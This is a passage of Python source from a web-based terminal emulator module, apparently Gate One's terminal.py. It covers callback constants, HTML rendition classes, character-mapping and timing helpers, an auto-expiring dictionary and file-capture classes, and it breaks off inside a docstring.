==================================== ================================================================================ :attr:`terminal.CALLBACK_SCROLL_UP` The terminal is scrolled up (back). :attr:`terminal.CALLBACK_CHANGED` The screen is changed/updated. :attr:`terminal.CALLBACK_CURSOR_POS` The cursor position changes. :attr:`terminal.CALLBACK_DSR` A Device Status Report (DSR) is requested (via the DSR escape sequence). :attr:`terminal.CALLBACK_TITLE` The terminal title changes (xterm-style) :attr:`terminal.CALLBACK_BELL` The bell character (^G) is encountered. :attr:`terminal.CALLBACK_OPT` The special optional escape sequence is encountered. :attr:`terminal.CALLBACK_MODE` The terminal mode setting changes (e.g. use alternate screen buffer). :attr:`terminal.CALLBACK_MESSAGE` The terminal needs to send the user a message (without messing with the screen). ==================================== ================================================================================ Note that CALLBACK_DSR is special in that it in most cases it will be called with arguments. See the code for examples of how and when this happens. Also, in most cases it is unwise to override CALLBACK_MODE since this method is primarily meant for internal use within the Terminal class. Using Terminal -------------- Gate One makes extensive use of the Terminal class and its callbacks. So that's a great place to look for specific examples (gateone.py and termio.py, specifically). Having said that, implementing Terminal is pretty straightforward:: >>> import terminal >>> term = terminal.Terminal(24, 80) >>> term.write("This text will be written to the terminal screen.") >>> term.dump() [u'This text will be written to the terminal screen. ', <snip> u' '] Here's an example with some basic callbacks: >>> def mycallback(): ... "This will be called whenever the screen changes." ... print("Screen update! Perfect time to dump the terminal screen.") ... print(term.dump()[0]) # Only need to see the top line for this demo =) ... print("Just dumped the screen.") >>> import terminal >>> term = terminal.Terminal(24, 80) >>> term.callbacks[term.CALLBACK_CHANGED] = mycallback >>> term.write("This should result in mycallback() being called") Screen update! Perfect time to dump the terminal screen. This should result in mycallback() being called Just dumped the screen. .. note:: In testing Gate One it was determined that it is faster to perform the conversion of a terminal screen to HTML on the server side than it is on the client side (via JavaScript anyway). About The Scrollback Bufffer ---------------------------- The Terminal class implements a scrollback buffer. Here's how it works: Whenever a :meth:`Terminal.scroll_up` event occurs, the line (or lines) that will be removed from the top of the screen will be placed into :attr:`Terminal.scrollback_buf`. Then whenever :meth:`Terminal.dump_html` is called the scrollback buffer will be returned along with the screen output and reset to an empty state. Why do this? In the event that a very large :meth:`Terminal.write` occurs (e.g. 'ps aux'), it gives the controlling program the ability to capture what went past the screen without some fancy tracking logic surrounding :meth:`Terminal.write`. More information about how this works can be had by looking at the :meth:`Terminal.dump_html` function itself. .. note:: There's more than one function that empties :attr:`Terminal.scrollback_buf` when called. 
You'll just have to have a look around =) Class Docstrings ================ """ # Import stdlib stuff import os, sys, re, logging, base64, codecs, unicodedata, tempfile, struct from io import BytesIO from array import array from datetime import datetime, timedelta from functools import partial from collections import defaultdict try: from itertools import imap, izip except ImportError: # Python3 uses map and zip instead imap = map izip = zip try: from collections import OrderedDict except ImportError: # Python <2.7 didn't have OrderedDict in collections try: from ordereddict import OrderedDict except ImportError: logging.error( "Error: Could not import OrderedDict. Please install it:") logging.error("\tsudo pip install ordereddict") logging.error( "...or download it from http://pypi.python.org/pypi/ordereddict") sys.exit(1) try: xrange = xrange except NameError: # Python 3 doesn't have xrange() xrange = range try: unichr = unichr except NameError: # Python 3 doesn't have unichr() unichr = chr try: basestring = basestring except NameError: # Python 3 doesn't have basestring basestring = (str, bytes) # Inernationalization support _ = str # So pyflakes doesn't complain import gettext gettext.install('terminal') # Globals _logged_pil_warning = False # Used so we don't spam the user with warnings _logged_mutagen_warning = False # Ditto CALLBACK_SCROLL_UP = 1 # Called after a scroll up event (new line) CALLBACK_CHANGED = 2 # Called after the screen is updated CALLBACK_CURSOR_POS = 3 # Called after the cursor position is updated # <waives hand in air> You are not concerned with the number 4 CALLBACK_DSR = 5 # Called when a DSR requires a response # NOTE: CALLBACK_DSR must accept 'response' as either the first argument or # as a keyword argument. CALLBACK_TITLE = 6 # Called when the terminal sets the window title CALLBACK_BELL = 7 # Called after ASCII_BEL is encountered. CALLBACK_OPT = 8 # Called when we encounter the optional ESC sequence # NOTE: CALLBACK_OPT must accept 'chars' as either the first argument or as # a keyword argument. CALLBACK_MODE = 9 # Called when the terminal mode changes (e.g. DECCKM) CALLBACK_RESET = 10 # Called when a terminal reset (^[[!p) is encountered CALLBACK_LEDS = 11 # Called when the state of the LEDs changes # Called when the terminal emulator encounters a situation where it wants to # tell the user about something (say, an error decoding an image) without # interfering with the terminal's screen. CALLBACK_MESSAGE = 12 # These are for HTML output: RENDITION_CLASSES = defaultdict(lambda: None, { 0: 'reset', # Special: Return everything to defaults 1: 'bold', 2: 'dim', 3: 'italic', 4: 'underline', 5: 'blink', 6: 'fastblink', 7: 'reverse', 8: 'hidden', 9: 'strike', 10: 'fontreset', # NOTE: The font renditions don't do anything right now 11: 'font11', # Mostly because I have no idea what they are supposed to look 12: 'font12', # like. 
13: 'font13', 14: 'font14', 15: 'font15', 16: 'font16', 17: 'font17', 18: 'font18', 19: 'font19', 20: 'fraktur', 21: 'boldreset', 22: 'dimreset', 23: 'italicreset', 24: 'underlinereset', 27: 'reversereset', 28: 'hiddenreset', 29: 'strikereset', # Foregrounds 30: 'f0', # Black 31: 'f1', # Red 32: 'f2', # Green 33: 'f3', # Yellow 34: 'f4', # Blue 35: 'f5', # Magenta 36: 'f6', # Cyan 37: 'f7', # White 38: '', # 256-color support uses this like so: \x1b[38;5;<color num>sm 39: 'foregroundreset', # Special: Set FG to default # Backgrounds 40: 'b0', # Black 41: 'b1', # Red 42: 'b2', # Green 43: 'b3', # Yellow 44: 'b4', # Blue 45: 'b5', # Magenta 46: 'b6', # Cyan 47: 'b7', # White 48: '', # 256-color support uses this like so: \x1b[48;5;<color num>sm 49: 'backgroundreset', # Special: Set BG to default 51: 'frame', 52: 'encircle', 53: 'overline', 60: 'rightline', 61: 'rightdoubleline', 62: 'leftline', 63: 'leftdoubleline', # aixterm colors (aka '16 color support'). They're supposed to be 'bright' # versions of the first 8 colors (hence the 'b'). # 'Bright' Foregrounds 90: 'bf0', # Bright black (whatever that is =) 91: 'bf1', # Bright red 92: 'bf2', # Bright green 93: 'bf3', # Bright yellow 94: 'bf4', # Bright blue 95: 'bf5', # Bright magenta 96: 'bf6', # Bright cyan 97: 'bf7', # Bright white # TODO: Handle the ESC sequence that sets the colors from 90-87 (e.g. ESC]91;orange/brown^G) # 'Bright' Backgrounds 100: 'bb0', # Bright black 101: 'bb1', # Bright red 102: 'bb2', # Bright green 103: 'bb3', # Bright yellow 104: 'bb4', # Bright blue 105: 'bb5', # Bright magenta 106: 'bb6', # Bright cyan 107: 'bb7' # Bright white }) # Generate the dict of 256-color (xterm) foregrounds and backgrounds for i in xrange(256): RENDITION_CLASSES[(i+1000)] = "fx%s" % i RENDITION_CLASSES[(i+10000)] = "bx%s" % i del i # Cleanup RESET_CLASSES = set([ 'backgroundreset', 'boldreset', 'dimreset', 'italicreset', 'underlinereset', 'reversereset', 'hiddenreset', 'strikereset', 'resetfont' ]) try: unichr(0x10000) # Will throw a ValueError on narrow Python builds SPECIAL = 1048576 # U+100000 or unichr(SPECIAL) (start of Plane 16) except: SPECIAL = 63561 def handle_special(e): """ Used in conjunction with :py:func:`codecs.register_error`, will replace special ascii characters such as 0xDA and 0xc4 (which are used by ncurses) with their Unicode equivalents. """ # TODO: Get this using curses special characters when appropriate #curses_specials = { ## NOTE: When $TERM is set to "Linux" these end up getting used by things ## like ncurses-based apps. In other words, it makes a whole lot ## of ugly look pretty again. #0xda: u'┌', # ACS_ULCORNER #0xc0: u'└', # ACS_LLCORNER #0xbf: u'┐', # ACS_URCORNER #0xd9: u'┘', # ACS_LRCORNER #0xb4: u'├', # ACS_RTEE #0xc3: u'┤', # ACS_LTEE #0xc1: u'┴', # ACS_BTEE #0xc2: u'┬', # ACS_TTEE #0xc4: u'─', # ACS_HLINE #0xb3: u'│', # ACS_VLINE #0xc5: u'┼', # ACS_PLUS #0x2d: u'', # ACS_S1 #0x5f: u'', # ACS_S9 #0x60: u'◆', # ACS_DIAMOND #0xb2: u'▒', # ACS_CKBOARD #0xf8: u'°', # ACS_DEGREE #0xf1: u'±', # ACS_PLMINUS #0xf9: u'•', # ACS_BULLET #0x3c: u'←', # ACS_LARROW #0x3e: u'→', # ACS_RARROW #0x76: u'↓', # ACS_DARROW #0x5e: u'↑', # ACS_UARROW #0xb0: u'⊞', # ACS_BOARD #0x0f: u'⨂', # ACS_LANTERN #0xdb: u'█', # ACS_BLOCK #} specials = { # Note to self: Why did I bother with these overly descriptive comments? 
Ugh # I've been staring at obscure symbols far too much lately ⨀_⨀ 128: u'€', # Euro sign 129: u' ', # Unknown (Using non-breaking spaces for all unknowns) 130: u'‚', # Single low-9 quotation mark 131: u'ƒ', # Latin small letter f with hook 132: u'„', # Double low-9 quotation mark 133: u'…', # Horizontal ellipsis 134: u'†', # Dagger 135: u'‡', # Double dagger 136: u'ˆ', # Modifier letter circumflex accent 137: u'‰', # Per mille sign 138: u'Š', # Latin capital letter S with caron 139: u'‹', # Single left-pointing angle quotation 140: u'Œ', # Latin capital ligature OE 141: u' ', # Unknown 142: u'Ž', #  Latin captial letter Z with caron 143: u' ', # Unknown 144: u' ', # Unknown 145: u'‘', # Left single quotation mark 146: u'’', # Right single quotation mark 147: u'“', # Left double quotation mark 148: u'”', # Right double quotation mark 149: u'•', # Bullet 150: u'–', # En dash 151: u'—', # Em dash 152: u'˜', # Small tilde 153: u'™', # Trade mark sign 154: u'š', # Latin small letter S with caron 155: u'›', # Single right-pointing angle quotation mark 156: u'œ', # Latin small ligature oe 157: u'Ø', # Upper-case slashed zero--using same as empty set (216) 158: u'ž', # Latin small letter z with caron 159: u'Ÿ', # Latin capital letter Y with diaeresis 160: u' ', # Non-breaking space 161: u'¡', # Inverted exclamation mark 162: u'¢', # Cent sign 163: u'£', # Pound sign 164: u'¤', # Currency sign 165: u'¥', # Yen sign 166: u'¦', # Pipe, Broken vertical bar 167: u'§', # Section sign 168: u'¨', # Spacing diaeresis - umlaut 169: u'©', # Copyright sign 170: u'ª', # Feminine ordinal indicator 171: u'«', # Left double angle quotes 172: u'¬', # Not sign 173: u"\u00AD", # Soft hyphen 174: u'®', # Registered trade mark sign 175: u'¯', # Spacing macron - overline 176: u'°', # Degree sign 177: u'±', # Plus-or-minus sign 178: u'²', # Superscript two - squared 179: u'³', # Superscript three - cubed 180: u'´', # Acute accent - spacing acute 181: u'µ', # Micro sign 182: u'¶', # Pilcrow sign - paragraph sign 183: u'·', # Middle dot - Georgian comma 184: u'¸', # Spacing cedilla 185: u'¹', # Superscript one 186: u'º', # Masculine ordinal indicator 187: u'»', # Right double angle quotes 188: u'¼', # Fraction one quarter 189: u'½', # Fraction one half 190: u'¾', # Fraction three quarters 191: u'¿', # Inverted question mark 192: u'À', # Latin capital letter A with grave 193: u'Á', # Latin capital letter A with acute 194: u'Â', # Latin capital letter A with circumflex 195: u'Ã', # Latin capital letter A with tilde 196: u'Ä', # Latin capital letter A with diaeresis 197: u'Å', # Latin capital letter A with ring above 198: u'Æ', # Latin capital letter AE 199: u'Ç', # Latin capital letter C with cedilla 200: u'È', # Latin capital letter E with grave 201: u'É', # Latin capital letter E with acute 202: u'Ê', # Latin capital letter E with circumflex 203: u'Ë', # Latin capital letter E with diaeresis 204: u'Ì', # Latin capital letter I with grave 205: u'Í', # Latin capital letter I with acute 206: u'Î', # Latin capital letter I with circumflex 207: u'Ï', # Latin capital letter I with diaeresis 208: u'Ð', # Latin capital letter ETH 209: u'Ñ', # Latin capital letter N with tilde 210: u'Ò', # Latin capital letter O with grave 211: u'Ó', # Latin capital letter O with acute 212: u'Ô', # Latin capital letter O with circumflex 213: u'Õ', # Latin capital letter O with tilde 214: u'Ö', # Latin capital letter O with diaeresis 215: u'×', # Multiplication sign 216: u'Ø', # Latin capital letter O with slash (aka "empty set") 217: u'Ù', # 
Latin capital letter U with grave 218: u'Ú', # Latin capital letter U with acute 219: u'Û', # Latin capital letter U with circumflex 220: u'Ü', # Latin capital letter U with diaeresis 221: u'Ý', # Latin capital letter Y with acute 222: u'Þ', # Latin capital letter THORN 223: u'ß', # Latin small letter sharp s - ess-zed 224: u'à', # Latin small letter a with grave 225: u'á', # Latin small letter a with acute 226: u'â', # Latin small letter a with circumflex 227: u'ã', # Latin small letter a with tilde 228: u'ä', # Latin small letter a with diaeresis 229: u'å', # Latin small letter a with ring above 230: u'æ', # Latin small letter ae 231: u'ç', # Latin small letter c with cedilla 232: u'è', # Latin small letter e with grave 233: u'é', # Latin small letter e with acute 234: u'ê', # Latin small letter e with circumflex 235: u'ë', # Latin small letter e with diaeresis 236: u'ì', # Latin small letter i with grave 237: u'í', # Latin small letter i with acute 238: u'î', # Latin small letter i with circumflex 239: u'ï', # Latin small letter i with diaeresis 240: u'ð', # Latin small letter eth 241: u'ñ', # Latin small letter n with tilde 242: u'ò', # Latin small letter o with grave 243: u'ó', # Latin small letter o with acute 244: u'ô', # Latin small letter o with circumflex 245: u'õ', # Latin small letter o with tilde 246: u'ö', # Latin small letter o with diaeresis 247: u'÷', # Division sign 248: u'ø', # Latin small letter o with slash 249: u'ù', # Latin small letter u with grave 250: u'ú', # Latin small letter u with acute 251: u'û', # Latin small letter u with circumflex 252: u'ü', # Latin small letter u with diaeresis 253: u'ý', # Latin small letter y with acute 254: u'þ', # Latin small letter thorn 255: u'ÿ', # Latin small letter y with diaeresis } # I left this in its odd state so I could differentiate between the two # in the future. chars = e.object if bytes == str: # Python 2 # Convert e.object to a bytearray for an easy switch to integers. # It is quicker than calling ord(char) on each char in e.object chars = bytearray(e.object) # NOTE: In Python 3 when you iterate over bytes they appear as integers. # So we don't need to convert to a bytearray in Python 3. if isinstance(e, (UnicodeEncodeError, UnicodeTranslateError)): s = [u'%s' % specials[c] for c in chars[e.start:e.end]] return ''.join(s), e.end else: s = [u'%s' % specials[c] for c in chars[e.start:e.end]] return ''.join(s), e.end codecs.register_error('handle_special', handle_special) # TODO List: # # * We need unit tests! # * Add a function that can dump the screen with text renditions represented as their usual escape sequences so applications that try to perform screen-scraping can match things like '\x1b[41mAuthentication configuration' without having to find specific character positions and then examining the renditions on that line. # Helper functions def _reduce_renditions(renditions): """ Takes a list, *renditions*, and reduces it to its logical equivalent (as far as renditions go). 
Example:: [0, 32, 0, 34, 0, 32] Would become:: [0, 32] Other Examples:: [0, 1, 36, 36] -> [0, 1, 36] [0, 30, 42, 30, 42] -> [0, 30, 42] [36, 32, 44, 42] -> [32, 42] [36, 35] -> [35] """ out_renditions = [] foreground = None background = None for rend in renditions: if rend < 29: if rend not in out_renditions: out_renditions.append(rend) elif rend > 29 and rend < 40: # Regular 8-color foregrounds foreground = rend elif rend > 39 and rend < 50: # Regular 8-color backgrounds background = rend elif rend > 91 and rend < 98: # 'Bright' (16-color) foregrounds foreground = rend elif rend > 99 and rend < 108: # 'Bright' (16-color) backgrounds background = rend elif rend > 1000 and rend < 10000: # 256-color foregrounds foreground = rend elif rend > 10000 and rend < 20000: # 256-color backgrounds background = rend else: out_renditions.append(rend) if foreground: out_renditions.append(foreground) if background: out_renditions.append(background) return out_renditions def unicode_counter(): """ A generator that returns incrementing Unicode characters that can be used as references inside a Unicode array. For example:: >>> counter = unicode_counter() >>> mapping_dict = {} >>> some_array = array('u') >>> # Pretend 'marker ...' below is a reference to something important >>> for i, c in enumerate(u'some string'): ... if c == u' ': # Mark the location of spaces ... # Perform some operation where we need to save a value ... result = some_evaluation(i, c) ... # Save some memory by storing a reference to result instead ... # of the same result over and over again ... if result not in mapping_dict.values(): ... marker = counter.next() ... some_array.append(marker) ... mapping_dict[marker] = result ... else: # Find the existing reference so we can use it again ... for k, v in mapping_dict.items(): ... if v == result: # Use the existing value ... some_array.append(k) ... else: ... some_array.append('\x00') # \x00 == "not interesting" placeholder >>> Now we could iterate over 'some string' and some_array simultaneously using zip(u'some string', some_array) to access those reference markers when we encountered the correct position. This can save a lot of memory if you need to store objects in memory that have a tendancy to repeat (e.g. text rendition lists in a terminal). .. note:: Meant to be used inside the renditions array to reference text rendition lists such as `[0, 1, 34]`. """ n = 1000 # Start at 1000 so we can use lower characters for other things while True: yield unichr(n) if n == 65535: # The end of unicode in narrow builds of Python n = 0 # Reset else: n += 1 # NOTE: Why use a unicode array() to store references instead of just a regular array()? Two reasons: 1) Large namespace. 2) Only need to use one kind of array for everything (convenience). It is also a large memory savings over "just using a list with references to items in a dict." def pua_counter(): """ A generator that returns a Unicode Private Use Area (PUA) character starting at the beginning of Plane 16 (U+100000); counting up by one with each successive call. If this is a narrow Python build the tail end of Plane 15 will be used as a fallback (with a lot less characters). .. note:: Meant to be used as references to non-text objects in the screen array() (since it can only contain unicode characters) """ if SPECIAL == 1048576: # Not a narrow build of Python n = SPECIAL # U+100000 or unichr(SPECIAL) (start of Plane 16) while True: yield unichr(n) if n == 1114111: n = SPECIAL # Reset--would be impressive to make it this far! 
else: n += 1 else: # This Python build is 'narrow' so we have to settle for less # Hopefully no real-world terminal will actually want to use one of # these characters. In my research I couldn't find a font that used # them. Please correct me if I'm wrong! n = SPECIAL # u'\uf849' while True: yield unichr(n) if n == 63717: # The end of nothing-but-block-chars in Plane 15 n = SPECIAL # Reset else: n += 1 def convert_to_timedelta(time_val): """ Given a *time_val* (string) such as '5d', returns a `datetime.timedelta` object representing the given value (e.g. `timedelta(days=5)`). Accepts the following '<num><char>' formats: ========= ============ ========================= Character Meaning Example ========= ============ ========================= (none) Milliseconds '500' -> 500 Milliseconds s Seconds '60s' -> 60 Seconds m Minutes '5m' -> 5 Minutes h Hours '24h' -> 24 Hours d Days '7d' -> 7 Days M Months '2M' -> 2 Months y Years '10y' -> 10 Years ========= ============ ========================= Examples:: >>> convert_to_timedelta('7d') datetime.timedelta(7) >>> convert_to_timedelta('24h') datetime.timedelta(1) >>> convert_to_timedelta('60m') datetime.timedelta(0, 3600) >>> convert_to_timedelta('120s') datetime.timedelta(0, 120) """ try: num = int(time_val) return timedelta(milliseconds=num) except ValueError: pass num = int(time_val[:-1]) if time_val.endswith('s'): return timedelta(seconds=num) elif time_val.endswith('m'): return timedelta(minutes=num) elif time_val.endswith('h'): return timedelta(hours=num) elif time_val.endswith('d'): return timedelta(days=num) elif time_val.endswith('M'): return timedelta(days=(num*30)) # Yeah this is approximate elif time_val.endswith('y'): return timedelta(days=(num*365)) # Sorry, no leap year support def total_seconds(td): """ Given a timedelta (*td*) return an integer representing the equivalent of Python 2.7's :meth:`datetime.timdelta.total_seconds`. """ return ((( td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) / 10**6)) # NOTE: This is something I'm investigating as a way to use the new go_async # module. A work-in-progress. Ignore for now... def spanify_screen(state_obj): """ Iterates over the lines in *screen* and *renditions*, applying HTML markup (span tags) where appropriate and returns the result as a list of lines. It also marks the cursor position via a <span> tag at the appropriate location. """ #logging.debug("_spanify_screen()") results = [] # NOTE: Why these duplicates of self.* and globals? Local variable # lookups are faster--especially in loops. 
    #special = SPECIAL
    rendition_classes = RENDITION_CLASSES
    html_cache = state_obj['html_cache']
    screen = state_obj['screen']
    renditions = state_obj['renditions']
    renditions_store = state_obj['renditions_store']
    cursorX = state_obj['cursorX']
    cursorY = state_obj['cursorY']
    show_cursor = state_obj['show_cursor']
    class_prefix = state_obj['class_prefix']
    #captured_files = state_obj['captured_files']
    spancount = 0
    current_classes = set()
    prev_rendition = None
    foregrounds = ('f0','f1','f2','f3','f4','f5','f6','f7')
    backgrounds = ('b0','b1','b2','b3','b4','b5','b6','b7')
    html_entities = {"&": "&amp;", '<': '&lt;', '>': '&gt;'}
    cursor_span = '<span class="%scursor">' % class_prefix
    for linecount, line_rendition in enumerate(izip(screen, renditions)):
        line = line_rendition[0]
        rendition = line_rendition[1]
        combined = (line + rendition).tounicode()
        if html_cache and combined in html_cache:
            # Always re-render the line with the cursor (or just had it)
            if cursor_span not in html_cache[combined]:
                # Use the cache...
                results.append(html_cache[combined])
                continue
        if not len(line.tounicode().rstrip()) and linecount != cursorY:
            # Line is empty so we don't need to process renditions
            results.append(line.tounicode())
            continue
        outline = ""
        if current_classes:
            outline += '<span class="%s%s">' % (
                class_prefix,
                (" %s" % class_prefix).join(current_classes))
        charcount = 0
        for char, rend in izip(line, rendition):
            rend = renditions_store[rend] # Get actual rendition
            #if ord(char) >= special: # Special stuff =)
                ## Obviously, not really a single character
                #if char in captured_files:
                    #outline += captured_files[char].html()
                    #continue
            changed = True
            if char in "&<>":
                # Have to convert ampersands and lt/gt to HTML entities
                char = html_entities[char]
            if rend == prev_rendition:
                # Shortcut... So we can skip all the logic below
                changed = False
            else:
                prev_rendition = rend
            if changed and rend:
                classes = imap(rendition_classes.get, rend)
                for _class in classes:
                    if _class and _class not in current_classes:
                        # Something changed... Start a new span
                        if spancount:
                            outline += "</span>"
                            spancount -= 1
                        if 'reset' in _class:
                            if _class == 'reset':
                                current_classes = set()
                                if spancount:
                                    for i in xrange(spancount):
                                        outline += "</span>"
                                    spancount = 0
                            else:
                                reset_class = _class.split('reset')[0]
                                if reset_class == 'foreground':
                                    # Remove any foreground classes
                                    # (current_classes is a set so we can't
                                    # pop() by index):
                                    current_classes.difference_update(
                                        foregrounds)
                                elif reset_class == 'background':
                                    current_classes.difference_update(
                                        backgrounds)
                                else:
                                    try:
                                        current_classes.remove(reset_class)
                                    except KeyError:
                                        # Trying to reset something that was
                                        # never set.
                                        # Ignore.
                                        pass
                        else:
                            if _class in foregrounds:
                                # Only one foreground/background at a time:
                                current_classes.difference_update(foregrounds)
                            elif _class in backgrounds:
                                current_classes.difference_update(backgrounds)
                            current_classes.add(_class)
                if current_classes:
                    outline += '<span class="%s%s">' % (
                        class_prefix,
                        (" %s" % class_prefix).join(current_classes))
                    spancount += 1
            if linecount == cursorY and charcount == cursorX: # Cursor
                if show_cursor:
                    outline += '<span class="%scursor">%s</span>' % (
                        class_prefix, char)
                else:
                    outline += char
            else:
                outline += char
            charcount += 1
        if outline:
            # Make sure all renditions terminate at the end of the line
            for whatever in xrange(spancount):
                outline += "</span>"
            results.append(outline)
            if html_cache:
                html_cache[combined] = outline
        else:
            results.append(None) # null is shorter than 4 spaces
            # NOTE: The client has been programmed to treat None (aka null in
            # JavaScript) as blank lines.
    for whatever in xrange(spancount): # Bit of cleanup to be safe
        results[-1] += "</span>"
    return (html_cache, results)

# Exceptions
class InvalidParameters(Exception):
    """
    Raised when `Terminal` is passed invalid parameters.
    """
    pass

# Classes
class AutoExpireDict(dict):
    """
    An override of Python's `dict` that expires keys after a given
    *_expire_timeout* timeout (`datetime.timedelta`).  The default expiration
    is one hour.  It is used like so::

        >>> expiring_dict = AutoExpireDict(timeout=timedelta(minutes=10))
        >>> expiring_dict['somekey'] = 'some value'
        >>> # You can see when this key was created:
        >>> print(expiring_dict.creation_times['somekey'])
        2013-04-15 18:44:18.224072

    10 minutes later your key will be gone::

        >>> 'somekey' in expiring_dict
        False

    The 'timeout' may be given as a `datetime.timedelta` object or a string
    like "1d" or "30s" (will be passed through the `convert_to_timedelta`
    function).

    By default `AutoExpireDict` will check for expired keys every 10 seconds
    but this can be changed by setting the 'interval'::

        >>> expiring_dict = AutoExpireDict(interval=5000) # 5 secs
        >>> # Or to change it after you've created one:
        >>> expiring_dict.interval = "10s"

    The 'interval' may be an integer, a `datetime.timedelta` object, or a
    string such as '10s' or '5m' (will be passed through the
    `convert_to_timedelta` function).

    If there are no keys remaining the `tornado.ioloop.PeriodicCallback`
    (``self._key_watcher``) that checks expiration will be automatically
    stopped.  As soon as a new key is added it will be started back up again.

    .. note:: Only works if there's a running instance of
        `tornado.ioloop.IOLoop`.
    """
    def __init__(self, *args, **kwargs):
        self.io_loop = IOLoop.current()
        self.creation_times = {}
        if 'timeout' in kwargs:
            self.timeout = kwargs.pop('timeout')
        if 'interval' in kwargs:
            self.interval = kwargs.pop('interval')
        super(AutoExpireDict, self).__init__(*args, **kwargs)
        # Set the start time on every key
        for k in self.keys():
            self.creation_times[k] = datetime.now()
        self._key_watcher = PeriodicCallback(
            self._timeout_checker, self.interval, io_loop=self.io_loop)
        self._key_watcher.start() # Will shut down at the next interval if empty

    @property
    def timeout(self):
        """
        A `property` that controls how long a key will last before being
        automatically removed.  May be given as a `datetime.timedelta` object
        or a string like "1d" or "30s" (will be passed through the
        `convert_to_timedelta` function).
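
        A quick sketch of both accepted forms (assuming a running IOLoop, per
        the note in the class docstring)::

            >>> d = AutoExpireDict()
            >>> d.timeout = "30s"               # string form
            >>> d.timeout = timedelta(hours=2)  # timedelta form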
""" if not hasattr(self, "_timeout"): self._timeout = timedelta(hours=1) # Default is 1-hour timeout return self._timeout @timeout.setter def timeout(self, value): if isinstance(value, basestring): value = convert_to_timedelta(value) self._timeout = value @property def interval(self): """ A `property` that controls how often we check for expired keys. May be given as milliseconds (integer), a `datetime.timedelta` object, or a string like, "1d", "30s" (will be passed through the `convert_to_timedelta` function). """ if not hasattr(self, "_interval"): self._interval = 10000 # Default is every 10 seconds return self._interval @interval.setter def interval(self, value): if isinstance(value, basestring): value = convert_to_timedelta(value) if isinstance(value, timedelta): value = total_seconds(value) * 1000 # PeriodicCallback uses ms self._interval = value # Restart the PeriodicCallback if hasattr(self, '_key_watcher'): self._key_watcher.stop() self._key_watcher = PeriodicCallback( self._timeout_checker, value, io_loop=self.io_loop) def renew(self, key): """ Resets the timeout on the given *key*; like it was just created. """ self.creation_times[key] = datetime.now() # Set/renew the start time # Start up the key watcher if it isn't already running if not self._key_watcher._running: self._key_watcher.start() def __setitem__(self, key, value): """ An override that tracks when keys are updated. """ super(AutoExpireDict, self).__setitem__(key, value) # Set normally self.renew(key) # Set/renew the start time def __delitem__(self, key): """ An override that makes sure *key* gets removed from ``self.creation_times`` dict. """ del self.creation_times[key] super(AutoExpireDict, self).__delitem__(key) def __del__(self): """ Ensures that our `tornado.ioloop.PeriodicCallback` (``self._key_watcher``) gets stopped. """ self._key_watcher.stop() def update(self, *args, **kwargs): """ An override that calls ``self.renew()`` for every key that gets updated. """ super(AutoExpireDict, self).update(*args, **kwargs) for key, value in kwargs.items(): self.renew(key) def clear(self): """ An override that empties ``self.creation_times`` and calls ``self._key_watcher.stop()``. """ super(AutoExpireDict, self).clear() self.creation_times.clear() # Shut down the key watcher right away self._key_watcher.stop() def _timeout_checker(self): """ Walks ``self`` and removes keys that have passed the expiration point. """ if not self.creation_times: self._key_watcher.stop() # Nothing left to watch for key, starttime in list(self.creation_times.items()): if datetime.now() - starttime > self.timeout: del self[key] # AutoExpireDict only works if Tornado is present. # Don't use the HTML_CACHE if Tornado isn't available. try: from tornado.ioloop import IOLoop, PeriodicCallback HTML_CACHE = AutoExpireDict(timeout=timedelta(minutes=1), interval=30000) except ImportError: HTML_CACHE = None class FileType(object): """ An object to hold the attributes of a supported file capture/output type. 
""" # These attributes are here to prevent AttributeErrors if not overridden thumbnail = None html_template = "" # Must be overridden html_icon_template = "" # Must be overridden # This is for things like PDFs which can contain other FileTypes: is_container = False # Must be overridden helper = None # Optional function to be called when a capture is started original_file = None # Can be used when the file is modified def __init__(self, name, mimetype, re_header, re_capture, suffix="", path="", linkpath="", icondir=None): """ **name:** Name of the file type. **mimetype:** Mime type of the file. **re_header:** The regex to match the start of the file. **re_capture:** The regex to carve the file out of the stream. **suffix:** (optional) The suffix to be appended to the end of the filename (if one is generated). **path:** (optional) The path to a file or directory where the file should be stored. If *path* is a directory a random filename will be chosen. **linkpath:** (optional) The path to use when generating a link in HTML output. **icondir:** (optional) A path to look for a relevant icon to display when generating HTML output. """ self.name = name self.mimetype = mimetype self.re_header = re_header self.re_capture = re_capture self.suffix = suffix # A path just in case something needs to access it outside of Python: self.path = path self.linkpath = linkpath self.icondir = icondir self.file_obj = None def __repr__(self): return "<%s>" % self.name def __str__(self): "Override if the defined file type warrants a text-based output." return self.__repr__() def __del__(self): """ Make sure that self.file_obj gets closed/deleted. """ logging.debug("FileType __del__(): Closing/deleting temp file(s)") try: self.file_obj.close() # Ensures it gets deleted except AttributeError: pass # Probably never got opened properly (bad file); no big try: self.original_file.close() except AttributeError: pass # Probably never got opened/saved properly def raw(self): self.file_obj.seek(0) data = open(self.file_obj).read() self.file_obj.seek(0) return data def html(self): """ Returns the object as an HTML-formatted string. Must be overridden. """ raise NotImplementedError def capture(self, data, term_instance=None): """ Stores *data* as a temporary file and returns that file's object. *term_instance* can be used by overrides of this function to make adjustments to the terminal emulator after the *data* is captured e.g. to make room for an image. """ # Remove the extra \r's that the terminal adds: data = data.replace(b'\r\n', b'\n') logging.debug("capture() len(data): %s" % len(data)) # Write the data to disk in a temporary location self.file_obj = tempfile.TemporaryFile() self.file_obj.write(data) self.file_obj.flush() # Leave it open return self.file_obj def close(self): """ Closes :attr:`self.file_obj` """ try: self.file_obj.close() except AttributeError: pass # file object never got created properly (probably missing PIL) class ImageFile(FileType): """ A subclass of :class:`FileType` for images (specifically to override :meth:`self.html` and :meth:`self.capture`). """ def capture(self, data, term_instance): """ Captures the image contained within *data*. Will use *term_instance* to make room for the image in the terminal screen. .. note:: Unlike :class:`FileType`, *term_instance* is mandatory. 
